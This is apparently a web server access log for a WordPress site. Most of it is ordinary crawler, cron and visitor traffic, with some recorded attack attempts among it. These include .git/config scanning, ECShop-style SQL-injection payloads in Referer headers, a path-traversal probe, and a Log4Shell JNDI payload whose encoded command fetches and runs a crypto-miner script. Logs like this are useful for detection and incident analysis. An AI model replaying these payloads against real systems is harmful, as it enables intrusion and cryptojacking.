222.137.2.186 - - [09/Oct/2025:15:14:40 +0800] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 200 10671 "-" "Opera/8.77.(X11; Linux i686; uz-UZ) Presto/2.9.169 Version/12.00"
120.82.83.127 - - [09/Oct/2025:15:15:38 +0800] "GET /wp-content/plugins/elementor-pro/readme.txt HTTP/1.1" 200 337 "-" "Opera/8.77.(X11; Linux i686; uz-UZ) Presto/2.9.169 Version/12.00"
180.184.144.53 - - [09/Oct/2025:15:39:28 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:15:41:48 +0800] "POST /wp-cron.php?doing_wp_cron=1759995708.6243510246276855468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [09/Oct/2025:15:41:48 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:15:47:12 +0800] "POST /wp-cron.php?doing_wp_cron=1759996032.8684899806976318359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:15:47:13 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:15:48:18 +0800] "POST /wp-cron.php?doing_wp_cron=1759996098.5325169563293457031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.148.38 - - [09/Oct/2025:15:48:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.148.38 - - [09/Oct/2025:15:48:20 +0800] "GET / HTTP/1.1" 200 33466 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Oct/2025:15:54:48 +0800] "POST /wp-cron.php?doing_wp_cron=1759996488.8220520019531250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [09/Oct/2025:15:54:49 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:16:11:28 +0800] "POST /wp-cron.php?doing_wp_cron=1759997488.4973740577697753906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.15 - - [09/Oct/2025:16:11:28 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [09/Oct/2025:16:12:21 +0800] "POST /wp-cron.php?doing_wp_cron=1759997541.1233220100402832031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.207 - - [09/Oct/2025:16:12:21 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [09/Oct/2025:16:28:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759998503.7885439395904541015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.177.72.48 - - [09/Oct/2025:16:28:23 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:25 +0800] "GET /update/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:26 +0800] "GET /app/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:27 +0800] "GET /admin/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:28 +0800] "GET /private/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:29 +0800] "GET /home/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:30 +0800] "GET /src/.git/config HTTP/1.1" 404 8989 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:31 +0800] "GET /backend/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:32 +0800] "GET /frontend/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:33 +0800] "GET /api/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:34 +0800] "GET /dev/.git/config HTTP/1.1" 404 8991 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:36 +0800] "GET /backup/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:37 +0800] "GET /production/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:38 +0800] "GET /website/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:39 +0800] "GET /portal/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:40 +0800] "GET /dashboard/.git/config HTTP/1.1" 404 8989 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:41 +0800] "GET /cms/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:42 +0800] "GET /wp-content/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
185.177.72.48 - - [09/Oct/2025:16:28:42 +0800] "GET /blog/.git/config HTTP/1.1" 404 8990 "-" "Python/3.12 aiohttp/3.12.15"
36.133.115.36 - - [09/Oct/2025:16:32:05 +0800] "POST /wp-cron.php?doing_wp_cron=1759998725.0658431053161621093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:16:32:05 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
116.179.32.19 - - [09/Oct/2025:16:32:44 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [09/Oct/2025:16:34:36 +0800] "POST /wp-cron.php?doing_wp_cron=1759998876.8474900722503662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [09/Oct/2025:16:34:37 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:16:45:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759999514.7459619045257568359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [09/Oct/2025:16:45:15 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.102 - - [09/Oct/2025:16:48:23 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [09/Oct/2025:16:48:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759999703.2322430610656738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [09/Oct/2025:16:57:38 +0800] "POST /wp-cron.php?doing_wp_cron=1760000258.5172159671783447265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.216.150.17 - - [09/Oct/2025:16:57:38 +0800] "GET / HTTP/1.1" 200 33466 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
94.103.93.19 - - [09/Oct/2025:17:02:25 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:17:17:05 +0800] "POST /wp-cron.php?doing_wp_cron=1760001425.1852400302886962890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:17:17:05 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.91 - - [09/Oct/2025:17:17:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:17:36:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760002563.7645010948181152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.15 - - [09/Oct/2025:17:36:03 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [09/Oct/2025:17:36:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760002613.7770490646362304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [09/Oct/2025:17:36:54 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
45.204.215.184 - - [09/Oct/2025:17:43:01 +0800] "GET /user.php?act=login HTTP/1.1" 404 47 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
45.204.215.184 - - [09/Oct/2025:17:43:01 +0800] "POST /user.php?act=signin HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
45.204.215.184 - - [09/Oct/2025:17:43:01 +0800] "POST /user.php HTTP/1.1" 404 47 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:193:\x22*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/*\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
36.133.115.36 - - [09/Oct/2025:17:45:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760003118.0742669105529785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [09/Oct/2025:17:45:18 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:17:52:59 +0800] "POST /wp-cron.php?doing_wp_cron=1760003578.9810049533843994140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.109 - - [09/Oct/2025:17:52:59 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [09/Oct/2025:17:59:55 +0800] "POST /wp-cron.php?doing_wp_cron=1760003995.5991370677947998046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [09/Oct/2025:17:59:55 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:18:02:31 +0800] "POST /wp-cron.php?doing_wp_cron=1760004151.3787930011749267578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.28.140.106 - - [09/Oct/2025:18:02:31 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Oct/2025:18:03:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760004219.5438430309295654296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:18:03:39 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:18:25:02 +0800] "POST /wp-cron.php?doing_wp_cron=1760005502.9486238956451416015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.132 - - [09/Oct/2025:18:25:02 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:18:26:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760005587.4359519481658935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.102.162.210 - - [09/Oct/2025:18:26:27 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.102.162.210 - - [09/Oct/2025:18:26:27 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
183.167.172.133 - - [09/Oct/2025:18:26:28 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
183.134.59.131 - - [09/Oct/2025:18:28:18 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.133.115.36 - - [09/Oct/2025:18:28:19 +0800] "POST /wp-cron.php?doing_wp_cron=1760005699.8024039268493652343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.134.59.131 - - [09/Oct/2025:18:28:20 +0800] "GET / HTTP/1.1" 200 33466 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
183.134.59.131 - - [09/Oct/2025:18:28:48 +0800] "GET / HTTP/1.1" 200 39369 "-" "Opera/9.02 (Windows NT 5.1; U; en)"
36.133.115.36 - - [09/Oct/2025:18:31:44 +0800] "POST /wp-cron.php?doing_wp_cron=1760005904.0864260196685791015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
175.6.217.4 - - [09/Oct/2025:18:31:44 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
175.6.217.4 - - [09/Oct/2025:18:31:45 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Oct/2025:18:41:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760006487.4643490314483642578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [09/Oct/2025:18:41:27 +0800] "GET / HTTP/1.0" 301 0 "-" "BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100"
36.133.115.36 - - [09/Oct/2025:18:44:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760006681.0724020004272460937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [09/Oct/2025:18:44:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:18:49:28 +0800] "POST /wp-cron.php?doing_wp_cron=1760006968.5655350685119628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:18:49:28 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:18:51:08 +0800] "POST /wp-cron.php?doing_wp_cron=1760007068.0386550426483154296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [09/Oct/2025:18:51:08 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:18:54:19 +0800] "POST /wp-cron.php?doing_wp_cron=1760007258.9794809818267822265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.158 - - [09/Oct/2025:18:54:19 +0800] "GET /?s=2026 HTTP/1.1" 200 17611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
84.246.85.11 - - [09/Oct/2025:19:17:33 +0800] "GET / HTTP/1.1" 200 39369 "-" "2ip bot/1.1 (+https://2ip.io)"
84.246.85.11 - - [09/Oct/2025:19:17:35 +0800] "GET / HTTP/1.1" 200 39369 "-" "2ip bot/1.1 (+https://2ip.io)"
84.246.85.11 - - [09/Oct/2025:19:17:36 +0800] "GET / HTTP/1.1" 200 39369 "-" "2ip bot/1.1 (+https://2ip.io)"
36.133.115.36 - - [09/Oct/2025:19:19:30 +0800] "POST /wp-cron.php?doing_wp_cron=1760008770.7989370822906494140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.35.153 - - [09/Oct/2025:19:19:31 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [09/Oct/2025:19:26:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760009175.4607059955596923828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [09/Oct/2025:19:26:15 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:19:32:16 +0800] "POST /wp-cron.php?doing_wp_cron=1760009536.6473319530487060546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.180.140.10 - - [09/Oct/2025:19:32:16 +0800] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:19:38:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760009936.6867699623107910156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:19:38:57 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:19:51:21 +0800] "POST /wp-cron.php?doing_wp_cron=1760010681.5397899150848388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [09/Oct/2025:19:51:21 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:19:58:13 +0800] "POST /wp-cron.php?doing_wp_cron=1760011093.6938059329986572265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.204.215.184 - - [09/Oct/2025:19:58:13 +0800] "GET /index.php?index=a&skin&dataoptimize_html=/../../../robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
180.153.236.189 - - [09/Oct/2025:20:02:44 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:20:02:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760011373.0939230918884277343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.153.236.137 - - [09/Oct/2025:20:02:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.12.252 - - [09/Oct/2025:20:03:57 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:20:04:00 +0800] "POST /wp-cron.php?doing_wp_cron=1760011440.6106889247894287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.12.252 - - [09/Oct/2025:20:04:00 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [09/Oct/2025:20:11:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760011902.8873109817504882812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.203.211.116 - - [09/Oct/2025:20:11:42 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [09/Oct/2025:20:12:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760011935.7763359546661376953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [09/Oct/2025:20:12:15 +0800] "HEAD /druid/index.html HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [09/Oct/2025:20:18:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760012325.0535449981689453125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [09/Oct/2025:20:18:45 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [09/Oct/2025:20:18:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760012326.2905530929565429687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
